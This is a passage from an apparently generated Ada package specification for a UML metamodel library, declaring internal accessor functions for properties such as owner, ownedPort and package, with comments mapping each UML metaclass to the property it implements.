-- DataType => DataType::ownedOperation -- DeploymentSpecification => Artifact::ownedOperation -- Device => Class::ownedOperation -- Enumeration => DataType::ownedOperation -- ExecutionEnvironment => Class::ownedOperation -- FunctionBehavior => Class::ownedOperation -- Interaction => Class::ownedOperation -- Interface => Interface::ownedOperation -- Node => Class::ownedOperation -- OpaqueBehavior => Class::ownedOperation -- PrimitiveType => DataType::ownedOperation -- ProtocolStateMachine => Class::ownedOperation -- StateMachine => Class::ownedOperation -- Stereotype => Class::ownedOperation function Internal_Get_Owned_Parameter (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Activity => Behavior::ownedParameter -- FunctionBehavior => Behavior::ownedParameter -- Interaction => Behavior::ownedParameter -- OpaqueBehavior => Behavior::ownedParameter -- Operation => BehavioralFeature::ownedParameter -- ProtocolStateMachine => Behavior::ownedParameter -- Reception => BehavioralFeature::ownedParameter -- RedefinableTemplateSignature => TemplateSignature::ownedParameter -- StateMachine => Behavior::ownedParameter -- TemplateSignature => TemplateSignature::ownedParameter function Internal_Get_Owned_Parameter_Set (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Activity => Behavior::ownedParameterSet -- FunctionBehavior => Behavior::ownedParameterSet -- Interaction => Behavior::ownedParameterSet -- OpaqueBehavior => Behavior::ownedParameterSet -- Operation => BehavioralFeature::ownedParameterSet -- ProtocolStateMachine => Behavior::ownedParameterSet -- Reception => BehavioralFeature::ownedParameterSet -- StateMachine => Behavior::ownedParameterSet function Internal_Get_Owned_Parametered_Element (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Owned_Parametered_Element (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ClassifierTemplateParameter => TemplateParameter::ownedParameteredElement -- ConnectableElementTemplateParameter => TemplateParameter::ownedParameteredElement -- OperationTemplateParameter => TemplateParameter::ownedParameteredElement -- TemplateParameter => TemplateParameter::ownedParameteredElement function Internal_Get_Owned_Port (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Activity => EncapsulatedClassifier::ownedPort -- AssociationClass => EncapsulatedClassifier::ownedPort -- Class => EncapsulatedClassifier::ownedPort -- Component => EncapsulatedClassifier::ownedPort -- Device => EncapsulatedClassifier::ownedPort -- ExecutionEnvironment => EncapsulatedClassifier::ownedPort -- FunctionBehavior => EncapsulatedClassifier::ownedPort -- Interaction => EncapsulatedClassifier::ownedPort -- Node => EncapsulatedClassifier::ownedPort -- OpaqueBehavior => EncapsulatedClassifier::ownedPort -- ProtocolStateMachine => EncapsulatedClassifier::ownedPort -- StateMachine => EncapsulatedClassifier::ownedPort -- Stereotype => EncapsulatedClassifier::ownedPort function Internal_Get_Owned_Reception (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Activity => Class::ownedReception -- AssociationClass => Class::ownedReception -- Class => Class::ownedReception -- Component => Class::ownedReception -- Device => Class::ownedReception -- ExecutionEnvironment => Class::ownedReception -- FunctionBehavior => Class::ownedReception -- Interaction => Class::ownedReception -- Interface => Interface::ownedReception -- Node => Class::ownedReception -- OpaqueBehavior => Class::ownedReception -- ProtocolStateMachine => Class::ownedReception -- StateMachine => Class::ownedReception -- Stereotype => Class::ownedReception function Internal_Get_Owned_Rule (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Activity => Namespace::ownedRule -- Actor => Namespace::ownedRule -- Artifact => Namespace::ownedRule -- Association => Namespace::ownedRule -- AssociationClass => Namespace::ownedRule -- Class => Namespace::ownedRule -- Collaboration => Namespace::ownedRule -- CommunicationPath => Namespace::ownedRule -- Component => Namespace::ownedRule -- ConditionalNode => Namespace::ownedRule -- DataType => Namespace::ownedRule -- DeploymentSpecification => Namespace::ownedRule -- Device => Namespace::ownedRule -- Enumeration => Namespace::ownedRule -- ExecutionEnvironment => Namespace::ownedRule -- ExpansionRegion => Namespace::ownedRule -- Extension => Namespace::ownedRule -- FinalState => Namespace::ownedRule -- FunctionBehavior => Namespace::ownedRule -- InformationItem => Namespace::ownedRule -- Interaction => Namespace::ownedRule -- InteractionOperand => Namespace::ownedRule -- Interface => Namespace::ownedRule -- LoopNode => Namespace::ownedRule -- Model => Namespace::ownedRule -- Node => Namespace::ownedRule -- OpaqueBehavior => Namespace::ownedRule -- Operation => Namespace::ownedRule -- Package => Namespace::ownedRule -- PrimitiveType => Namespace::ownedRule -- Profile => Namespace::ownedRule -- ProtocolStateMachine => Namespace::ownedRule -- ProtocolTransition => Namespace::ownedRule -- Reception => Namespace::ownedRule -- Region => Namespace::ownedRule -- SequenceNode => Namespace::ownedRule -- Signal => Namespace::ownedRule -- State => Namespace::ownedRule -- StateMachine => Namespace::ownedRule -- Stereotype => Namespace::ownedRule -- StructuredActivityNode => Namespace::ownedRule -- Transition => Namespace::ownedRule -- UseCase => Namespace::ownedRule function Internal_Get_Owned_Stereotype (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Model => Package::ownedStereotype -- Package => Package::ownedStereotype -- Profile => Package::ownedStereotype function Internal_Get_Owned_Template_Signature (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Owned_Template_Signature (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- Activity => Classifier::ownedTemplateSignature -- Actor => Classifier::ownedTemplateSignature -- Artifact => Classifier::ownedTemplateSignature -- Association => Classifier::ownedTemplateSignature -- AssociationClass => Classifier::ownedTemplateSignature -- Class => Classifier::ownedTemplateSignature -- Collaboration => Classifier::ownedTemplateSignature -- CommunicationPath => Classifier::ownedTemplateSignature -- Component => Classifier::ownedTemplateSignature -- DataType => Classifier::ownedTemplateSignature -- DeploymentSpecification => Classifier::ownedTemplateSignature -- Device => Classifier::ownedTemplateSignature -- Enumeration => Classifier::ownedTemplateSignature -- ExecutionEnvironment => Classifier::ownedTemplateSignature -- Extension => Classifier::ownedTemplateSignature -- FunctionBehavior => Classifier::ownedTemplateSignature -- InformationItem => Classifier::ownedTemplateSignature -- Interaction => Classifier::ownedTemplateSignature -- Interface => Classifier::ownedTemplateSignature -- Model => TemplateableElement::ownedTemplateSignature -- Node => Classifier::ownedTemplateSignature -- OpaqueBehavior => Classifier::ownedTemplateSignature -- Operation => TemplateableElement::ownedTemplateSignature -- Package => TemplateableElement::ownedTemplateSignature -- PrimitiveType => Classifier::ownedTemplateSignature -- Profile => TemplateableElement::ownedTemplateSignature -- ProtocolStateMachine => Classifier::ownedTemplateSignature -- Signal => Classifier::ownedTemplateSignature -- StateMachine => Classifier::ownedTemplateSignature -- Stereotype => Classifier::ownedTemplateSignature -- StringExpression => TemplateableElement::ownedTemplateSignature -- UseCase => Classifier::ownedTemplateSignature function Internal_Get_Owned_Type (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Model => Package::ownedType -- Package => Package::ownedType -- Profile => Package::ownedType function Internal_Get_Owned_Use_Case (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Activity => Classifier::ownedUseCase -- Actor => Classifier::ownedUseCase -- Artifact => Classifier::ownedUseCase -- Association => Classifier::ownedUseCase -- AssociationClass => Classifier::ownedUseCase -- Class => Classifier::ownedUseCase -- Collaboration => Classifier::ownedUseCase -- CommunicationPath => Classifier::ownedUseCase -- Component => Classifier::ownedUseCase -- DataType => Classifier::ownedUseCase -- DeploymentSpecification => Classifier::ownedUseCase -- Device => Classifier::ownedUseCase -- Enumeration => Classifier::ownedUseCase -- ExecutionEnvironment => Classifier::ownedUseCase -- Extension => Classifier::ownedUseCase -- FunctionBehavior => Classifier::ownedUseCase -- InformationItem => Classifier::ownedUseCase -- Interaction => Classifier::ownedUseCase -- Interface => Classifier::ownedUseCase -- Node => Classifier::ownedUseCase -- OpaqueBehavior => Classifier::ownedUseCase -- PrimitiveType => Classifier::ownedUseCase -- ProtocolStateMachine => Classifier::ownedUseCase -- Signal => Classifier::ownedUseCase -- StateMachine => Classifier::ownedUseCase -- Stereotype => Classifier::ownedUseCase -- UseCase => Classifier::ownedUseCase function Internal_Get_Owner (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; -- Abstraction => Element::owner -- AcceptCallAction => Element::owner -- AcceptEventAction => Element::owner -- ActionExecutionSpecification => Element::owner -- ActionInputPin => Element::owner -- Activity => Element::owner -- ActivityFinalNode => Element::owner -- ActivityParameterNode => Element::owner -- ActivityPartition => Element::owner -- Actor => Element::owner -- AddStructuralFeatureValueAction => Element::owner -- AddVariableValueAction => Element::owner -- AnyReceiveEvent => Element::owner -- Artifact => Element::owner -- Association => Element::owner -- AssociationClass => Element::owner -- BehaviorExecutionSpecification => Element::owner -- BroadcastSignalAction => Element::owner -- CallBehaviorAction => Element::owner -- CallEvent => Element::owner -- CallOperationAction => Element::owner -- CentralBufferNode => Element::owner -- ChangeEvent => Element::owner -- Class => Element::owner -- ClassifierTemplateParameter => Element::owner -- Clause => Element::owner -- ClearAssociationAction => Element::owner -- ClearStructuralFeatureAction => Element::owner -- ClearVariableAction => Element::owner -- Collaboration => Element::owner -- CollaborationUse => Element::owner -- CombinedFragment => Element::owner -- Comment => Element::owner -- CommunicationPath => Element::owner -- Component => Element::owner -- ComponentRealization => Element::owner -- ConditionalNode => Element::owner -- ConnectableElementTemplateParameter => Element::owner -- ConnectionPointReference => Element::owner -- Connector => Element::owner -- ConnectorEnd => Element::owner -- ConsiderIgnoreFragment => Element::owner -- Constraint => Element::owner -- Continuation => Element::owner -- ControlFlow => Element::owner -- CreateLinkAction => Element::owner -- CreateLinkObjectAction => Element::owner -- CreateObjectAction => Element::owner -- UMLActivityDiagram => Element::owner -- UMLClassDiagram => Element::owner -- UMLComponentDiagram => Element::owner -- UMLCompositeStructureDiagram => Element::owner -- UMLDeploymentDiagram => Element::owner -- UMLInteractionDiagram => Element::owner -- UMLObjectDiagram => Element::owner -- UMLPackageDiagram => Element::owner -- UMLProfileDiagram => Element::owner -- UMLStateMachineDiagram => Element::owner -- UMLStyle => Element::owner -- UMLUseCaseDiagram => Element::owner -- DataStoreNode => Element::owner -- DataType => Element::owner -- DecisionNode => Element::owner -- Dependency => Element::owner -- Deployment => Element::owner -- DeploymentSpecification => Element::owner -- DestroyLinkAction => Element::owner -- DestroyObjectAction => Element::owner -- DestructionOccurrenceSpecification => Element::owner -- Device => Element::owner -- Duration => Element::owner -- DurationConstraint => Element::owner -- DurationInterval => Element::owner -- DurationObservation => Element::owner -- ElementImport => Element::owner -- Enumeration => Element::owner -- EnumerationLiteral => Element::owner -- ExceptionHandler => Element::owner -- ExecutionEnvironment => Element::owner -- ExecutionOccurrenceSpecification => Element::owner -- ExpansionNode => Element::owner -- ExpansionRegion => Element::owner -- Expression => Element::owner -- Extend => Element::owner -- Extension => Element::owner -- ExtensionEnd => Element::owner -- ExtensionPoint => Element::owner -- FinalState => Element::owner -- FlowFinalNode => Element::owner -- ForkNode => Element::owner -- FunctionBehavior => Element::owner -- Gate => Element::owner -- GeneralOrdering => Element::owner -- Generalization => Element::owner -- GeneralizationSet => Element::owner -- Image => Element::owner -- Include => Element::owner -- InformationFlow => Element::owner -- InformationItem => Element::owner -- InitialNode => Element::owner -- InputPin => Element::owner -- InstanceSpecification => Element::owner -- InstanceValue => Element::owner -- Interaction => Element::owner -- InteractionConstraint => Element::owner -- InteractionOperand => Element::owner -- InteractionUse => Element::owner -- Interface => Element::owner -- InterfaceRealization => Element::owner -- InterruptibleActivityRegion => Element::owner -- Interval => Element::owner -- IntervalConstraint => Element::owner -- JoinNode => Element::owner -- Lifeline => Element::owner -- LinkEndCreationData => Element::owner -- LinkEndData => Element::owner -- LinkEndDestructionData => Element::owner -- LiteralBoolean => Element::owner -- LiteralInteger => Element::owner -- LiteralNull => Element::owner -- LiteralReal => Element::owner -- LiteralString => Element::owner -- LiteralUnlimitedNatural => Element::owner -- LoopNode => Element::owner -- Manifestation => Element::owner -- MergeNode => Element::owner -- Message => Element::owner -- MessageOccurrenceSpecification => Element::owner -- Model => Element::owner -- Node => Element::owner -- ObjectFlow => Element::owner -- OccurrenceSpecification => Element::owner -- OpaqueAction => Element::owner -- OpaqueBehavior => Element::owner -- OpaqueExpression => Element::owner -- Operation => Element::owner -- OperationTemplateParameter => Element::owner -- OutputPin => Element::owner -- Package => Element::owner -- PackageImport => Element::owner -- PackageMerge => Element::owner -- Parameter => Element::owner -- ParameterSet => Element::owner -- PartDecomposition => Element::owner -- Port => Element::owner -- PrimitiveType => Element::owner -- Profile => Element::owner -- ProfileApplication => Element::owner -- Property => Element::owner -- ProtocolConformance => Element::owner -- ProtocolStateMachine => Element::owner -- ProtocolTransition => Element::owner -- Pseudostate => Element::owner -- QualifierValue => Element::owner -- RaiseExceptionAction => Element::owner -- ReadExtentAction => Element::owner -- ReadIsClassifiedObjectAction => Element::owner -- ReadLinkAction => Element::owner -- ReadLinkObjectEndAction => Element::owner -- ReadLinkObjectEndQualifierAction => Element::owner -- ReadSelfAction => Element::owner -- ReadStructuralFeatureAction => Element::owner -- ReadVariableAction => Element::owner -- Realization => Element::owner -- Reception => Element::owner -- ReclassifyObjectAction => Element::owner -- RedefinableTemplateSignature => Element::owner -- ReduceAction => Element::owner -- Region => Element::owner -- RemoveStructuralFeatureValueAction => Element::owner -- RemoveVariableValueAction => Element::owner -- ReplyAction => Element::owner -- SendObjectAction => Element::owner -- SendSignalAction => Element::owner -- SequenceNode => Element::owner -- Signal => Element::owner -- SignalEvent => Element::owner -- Slot => Element::owner -- StartClassifierBehaviorAction => Element::owner -- StartObjectBehaviorAction => Element::owner -- State => Element::owner -- StateInvariant => Element::owner -- StateMachine => Element::owner -- Stereotype => Element::owner -- StringExpression => Element::owner -- StructuredActivityNode => Element::owner -- Substitution => Element::owner -- TemplateBinding => Element::owner -- TemplateParameter => Element::owner -- TemplateParameterSubstitution => Element::owner -- TemplateSignature => Element::owner -- TestIdentityAction => Element::owner -- TimeConstraint => Element::owner -- TimeEvent => Element::owner -- TimeExpression => Element::owner -- TimeInterval => Element::owner -- TimeObservation => Element::owner -- Transition => Element::owner -- Trigger => Element::owner -- UnmarshallAction => Element::owner -- Usage => Element::owner -- UseCase => Element::owner -- ValuePin => Element::owner -- ValueSpecificationAction => Element::owner -- Variable => Element::owner function Internal_Get_Owning_Association (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Owning_Association (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ExtensionEnd => Property::owningAssociation -- Port => Property::owningAssociation -- Property => Property::owningAssociation function Internal_Get_Owning_Element (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Owning_Element (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- UMLActivityDiagram => UMLDiagramElement::owningElement -- UMLAssociationEndLabel => UMLDiagramElement::owningElement -- UMLAssociationOrConnectorOrLinkShape => UMLDiagramElement::owningElement -- UMLClassDiagram => UMLDiagramElement::owningElement -- UMLClassifierShape => UMLDiagramElement::owningElement -- UMLCompartment => UMLDiagramElement::owningElement -- UMLCompartmentableShape => UMLDiagramElement::owningElement -- UMLComponentDiagram => UMLDiagramElement::owningElement -- UMLCompositeStructureDiagram => UMLDiagramElement::owningElement -- UMLDeploymentDiagram => UMLDiagramElement::owningElement -- UMLEdge => UMLDiagramElement::owningElement -- UMLInteractionDiagram => UMLDiagramElement::owningElement -- UMLInteractionTableLabel => UMLDiagramElement::owningElement -- UMLKeywordLabel => UMLDiagramElement::owningElement -- UMLLabel => UMLDiagramElement::owningElement -- UMLMultiplicityLabel => UMLDiagramElement::owningElement -- UMLNameLabel => UMLDiagramElement::owningElement -- UMLObjectDiagram => UMLDiagramElement::owningElement -- UMLPackageDiagram => UMLDiagramElement::owningElement -- UMLProfileDiagram => UMLDiagramElement::owningElement -- UMLRedefinesLabel => UMLDiagramElement::owningElement -- UMLShape => UMLDiagramElement::owningElement -- UMLStateMachineDiagram => UMLDiagramElement::owningElement -- UMLStateShape => UMLDiagramElement::owningElement -- UMLStereotypePropertyValueLabel => UMLDiagramElement::owningElement -- UMLTypedElementLabel => UMLDiagramElement::owningElement -- UMLUseCaseDiagram => UMLDiagramElement::owningElement function Internal_Get_Owning_Expression (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Owning_Expression (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- StringExpression => StringExpression::owningExpression function Internal_Get_Owning_Instance (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Owning_Instance (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- Slot => Slot::owningInstance function Internal_Get_Owning_Template_Parameter (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Owning_Template_Parameter (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- Abstraction => ParameterableElement::owningTemplateParameter -- Activity => ParameterableElement::owningTemplateParameter -- Actor => ParameterableElement::owningTemplateParameter -- AnyReceiveEvent => ParameterableElement::owningTemplateParameter -- Artifact => ParameterableElement::owningTemplateParameter -- Association => ParameterableElement::owningTemplateParameter -- AssociationClass => ParameterableElement::owningTemplateParameter -- CallEvent => ParameterableElement::owningTemplateParameter -- ChangeEvent => ParameterableElement::owningTemplateParameter -- Class => ParameterableElement::owningTemplateParameter -- Collaboration => ParameterableElement::owningTemplateParameter -- CommunicationPath => ParameterableElement::owningTemplateParameter -- Component => ParameterableElement::owningTemplateParameter -- ComponentRealization => ParameterableElement::owningTemplateParameter -- Constraint => ParameterableElement::owningTemplateParameter -- UMLActivityDiagram => ParameterableElement::owningTemplateParameter -- UMLClassDiagram => ParameterableElement::owningTemplateParameter -- UMLComponentDiagram => ParameterableElement::owningTemplateParameter -- UMLCompositeStructureDiagram => ParameterableElement::owningTemplateParameter -- UMLDeploymentDiagram => ParameterableElement::owningTemplateParameter -- UMLInteractionDiagram => ParameterableElement::owningTemplateParameter -- UMLObjectDiagram => ParameterableElement::owningTemplateParameter -- UMLPackageDiagram => ParameterableElement::owningTemplateParameter -- UMLProfileDiagram => ParameterableElement::owningTemplateParameter -- UMLStateMachineDiagram => ParameterableElement::owningTemplateParameter -- UMLStyle => ParameterableElement::owningTemplateParameter -- UMLUseCaseDiagram => ParameterableElement::owningTemplateParameter -- DataType => ParameterableElement::owningTemplateParameter -- Dependency => ParameterableElement::owningTemplateParameter -- Deployment => ParameterableElement::owningTemplateParameter -- DeploymentSpecification => ParameterableElement::owningTemplateParameter -- Device => ParameterableElement::owningTemplateParameter -- Duration => ParameterableElement::owningTemplateParameter -- DurationConstraint => ParameterableElement::owningTemplateParameter -- DurationInterval => ParameterableElement::owningTemplateParameter -- DurationObservation => ParameterableElement::owningTemplateParameter -- Enumeration => ParameterableElement::owningTemplateParameter -- EnumerationLiteral => ParameterableElement::owningTemplateParameter -- ExecutionEnvironment => ParameterableElement::owningTemplateParameter -- Expression => ParameterableElement::owningTemplateParameter -- Extension => ParameterableElement::owningTemplateParameter -- ExtensionEnd => ParameterableElement::owningTemplateParameter -- FunctionBehavior => ParameterableElement::owningTemplateParameter -- GeneralizationSet => ParameterableElement::owningTemplateParameter -- InformationFlow => ParameterableElement::owningTemplateParameter -- InformationItem => ParameterableElement::owningTemplateParameter -- InstanceSpecification => ParameterableElement::owningTemplateParameter -- InstanceValue => ParameterableElement::owningTemplateParameter -- Interaction => ParameterableElement::owningTemplateParameter -- InteractionConstraint => ParameterableElement::owningTemplateParameter -- Interface => ParameterableElement::owningTemplateParameter -- InterfaceRealization => ParameterableElement::owningTemplateParameter -- Interval => ParameterableElement::owningTemplateParameter -- IntervalConstraint => ParameterableElement::owningTemplateParameter -- LiteralBoolean => ParameterableElement::owningTemplateParameter -- LiteralInteger => ParameterableElement::owningTemplateParameter -- LiteralNull => ParameterableElement::owningTemplateParameter -- LiteralReal => ParameterableElement::owningTemplateParameter -- LiteralString => ParameterableElement::owningTemplateParameter -- LiteralUnlimitedNatural => ParameterableElement::owningTemplateParameter -- Manifestation => ParameterableElement::owningTemplateParameter -- Model => ParameterableElement::owningTemplateParameter -- Node => ParameterableElement::owningTemplateParameter -- OpaqueBehavior => ParameterableElement::owningTemplateParameter -- OpaqueExpression => ParameterableElement::owningTemplateParameter -- Operation => ParameterableElement::owningTemplateParameter -- Package => ParameterableElement::owningTemplateParameter -- Parameter => ParameterableElement::owningTemplateParameter -- Port => ParameterableElement::owningTemplateParameter -- PrimitiveType => ParameterableElement::owningTemplateParameter -- Profile => ParameterableElement::owningTemplateParameter -- Property => ParameterableElement::owningTemplateParameter -- ProtocolStateMachine => ParameterableElement::owningTemplateParameter -- Realization => ParameterableElement::owningTemplateParameter -- Signal => ParameterableElement::owningTemplateParameter -- SignalEvent => ParameterableElement::owningTemplateParameter -- StateMachine => ParameterableElement::owningTemplateParameter -- Stereotype => ParameterableElement::owningTemplateParameter -- StringExpression => ParameterableElement::owningTemplateParameter -- Substitution => ParameterableElement::owningTemplateParameter -- TimeConstraint => ParameterableElement::owningTemplateParameter -- TimeEvent => ParameterableElement::owningTemplateParameter -- TimeExpression => ParameterableElement::owningTemplateParameter -- TimeInterval => ParameterableElement::owningTemplateParameter -- TimeObservation => ParameterableElement::owningTemplateParameter -- Usage => ParameterableElement::owningTemplateParameter -- UseCase => ParameterableElement::owningTemplateParameter -- Variable => ParameterableElement::owningTemplateParameter function Internal_Get_Package (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Package (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- Activity => Type::package -- Actor => Type::package -- Artifact => Type::package -- Association => Type::package -- AssociationClass => Type::package -- Class => Type::package -- Collaboration => Type::package -- CommunicationPath => Type::package -- Component => Type::package -- DataType => Type::package -- DeploymentSpecification => Type::package -- Device => Type::package -- Enumeration => Type::package -- ExecutionEnvironment => Type::package -- Extension => Type::package -- FunctionBehavior => Type::package -- InformationItem => Type::package -- Interaction => Type::package -- Interface => Type::package -- Node => Type::package -- OpaqueBehavior => Type::package -- PrimitiveType => Type::package -- ProtocolStateMachine => Type::package -- Signal => Type::package -- StateMachine => Type::package -- Stereotype => Type::package -- UseCase => Type::package function Internal_Get_Package_Import (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Activity => Namespace::packageImport -- Actor => Namespace::packageImport -- Artifact => Namespace::packageImport -- Association => Namespace::packageImport -- AssociationClass => Namespace::packageImport -- Class => Namespace::packageImport -- Collaboration => Namespace::packageImport -- CommunicationPath => Namespace::packageImport -- Component => Namespace::packageImport -- ConditionalNode => Namespace::packageImport -- DataType => Namespace::packageImport -- DeploymentSpecification => Namespace::packageImport -- Device => Namespace::packageImport -- Enumeration => Namespace::packageImport -- ExecutionEnvironment => Namespace::packageImport -- ExpansionRegion => Namespace::packageImport -- Extension => Namespace::packageImport -- FinalState => Namespace::packageImport -- FunctionBehavior => Namespace::packageImport -- InformationItem => Namespace::packageImport -- Interaction => Namespace::packageImport -- InteractionOperand => Namespace::packageImport -- Interface => Namespace::packageImport -- LoopNode => Namespace::packageImport -- Model => Namespace::packageImport -- Node => Namespace::packageImport -- OpaqueBehavior => Namespace::packageImport -- Operation => Namespace::packageImport -- Package => Namespace::packageImport -- PrimitiveType => Namespace::packageImport -- Profile => Namespace::packageImport -- ProtocolStateMachine => Namespace::packageImport -- ProtocolTransition => Namespace::packageImport -- Reception => Namespace::packageImport -- Region => Namespace::packageImport -- SequenceNode => Namespace::packageImport -- Signal => Namespace::packageImport -- State => Namespace::packageImport -- StateMachine => Namespace::packageImport -- Stereotype => Namespace::packageImport -- StructuredActivityNode => Namespace::packageImport -- Transition => Namespace::packageImport -- UseCase => Namespace::packageImport function Internal_Get_Package_Merge (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Model => Package::packageMerge -- Package => Package::packageMerge -- Profile => Package::packageMerge function Internal_Get_Packaged_Element (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Component => Component::packagedElement -- Model => Package::packagedElement -- Package => Package::packagedElement -- Profile => Package::packagedElement function Internal_Get_Parameter (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Parameter (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ActivityParameterNode => ActivityParameterNode::parameter function Internal_Get_Parameter (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- ParameterSet => ParameterSet::parameter -- RedefinableTemplateSignature => TemplateSignature::parameter -- TemplateSignature => TemplateSignature::parameter function Internal_Get_Parameter_Set (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Parameter => Parameter::parameterSet function Internal_Get_Parameter_Substitution (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- TemplateBinding => TemplateBinding::parameterSubstitution function Internal_Get_Parametered_Element (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Parametered_Element (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ClassifierTemplateParameter => ClassifierTemplateParameter::parameteredElement -- ConnectableElementTemplateParameter => ConnectableElementTemplateParameter::parameteredElement -- OperationTemplateParameter => OperationTemplateParameter::parameteredElement -- TemplateParameter => TemplateParameter::parameteredElement function Internal_Get_Part (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Activity => StructuredClassifier::part -- AssociationClass => StructuredClassifier::part -- Class => StructuredClassifier::part -- Collaboration => StructuredClassifier::part -- Component => StructuredClassifier::part -- Device => StructuredClassifier::part -- ExecutionEnvironment => StructuredClassifier::part -- FunctionBehavior => StructuredClassifier::part -- Interaction => StructuredClassifier::part -- Node => StructuredClassifier::part -- OpaqueBehavior => StructuredClassifier::part -- ProtocolStateMachine => StructuredClassifier::part -- StateMachine => StructuredClassifier::part -- Stereotype => StructuredClassifier::part function Internal_Get_Part_With_Port (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Part_With_Port (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ConnectorEnd => ConnectorEnd::partWithPort function Internal_Get_Partition (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Activity => Activity::partition function Internal_Get_Port (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Trigger => Trigger::port function Internal_Get_Post_Condition (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Post_Condition (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ProtocolTransition => ProtocolTransition::postCondition function Internal_Get_Postcondition (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Activity => Behavior::postcondition -- FunctionBehavior => Behavior::postcondition -- Interaction => Behavior::postcondition -- OpaqueBehavior => Behavior::postcondition -- Operation => Operation::postcondition -- ProtocolStateMachine => Behavior::postcondition -- StateMachine => Behavior::postcondition function Internal_Get_Powertype (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Powertype (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- GeneralizationSet => GeneralizationSet::powertype function Internal_Get_Powertype_Extent (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Activity => Classifier::powertypeExtent -- Actor => Classifier::powertypeExtent -- Artifact => Classifier::powertypeExtent -- Association => Classifier::powertypeExtent -- AssociationClass => Classifier::powertypeExtent -- Class => Classifier::powertypeExtent -- Collaboration => Classifier::powertypeExtent -- CommunicationPath => Classifier::powertypeExtent -- Component => Classifier::powertypeExtent -- DataType => Classifier::powertypeExtent -- DeploymentSpecification => Classifier::powertypeExtent -- Device => Classifier::powertypeExtent -- Enumeration => Classifier::powertypeExtent -- ExecutionEnvironment => Classifier::powertypeExtent -- Extension => Classifier::powertypeExtent -- FunctionBehavior => Classifier::powertypeExtent -- InformationItem => Classifier::powertypeExtent -- Interaction => Classifier::powertypeExtent -- Interface => Classifier::powertypeExtent -- Node => Classifier::powertypeExtent -- OpaqueBehavior => Classifier::powertypeExtent -- PrimitiveType => Classifier::powertypeExtent -- ProtocolStateMachine => Classifier::powertypeExtent -- Signal => Classifier::powertypeExtent -- StateMachine => Classifier::powertypeExtent -- Stereotype => Classifier::powertypeExtent -- UseCase => Classifier::powertypeExtent function Internal_Get_Pre_Condition (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Pre_Condition (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ProtocolTransition => ProtocolTransition::preCondition function Internal_Get_Precondition (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Activity => Behavior::precondition -- FunctionBehavior => Behavior::precondition -- Interaction => Behavior::precondition -- OpaqueBehavior => Behavior::precondition -- Operation => Operation::precondition -- ProtocolStateMachine => Behavior::precondition -- StateMachine => Behavior::precondition function Internal_Get_Predecessor_Clause (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Clause => Clause::predecessorClause function Internal_Get_Profile (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; -- Stereotype => Stereotype::profile function Internal_Get_Profile_Application (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- 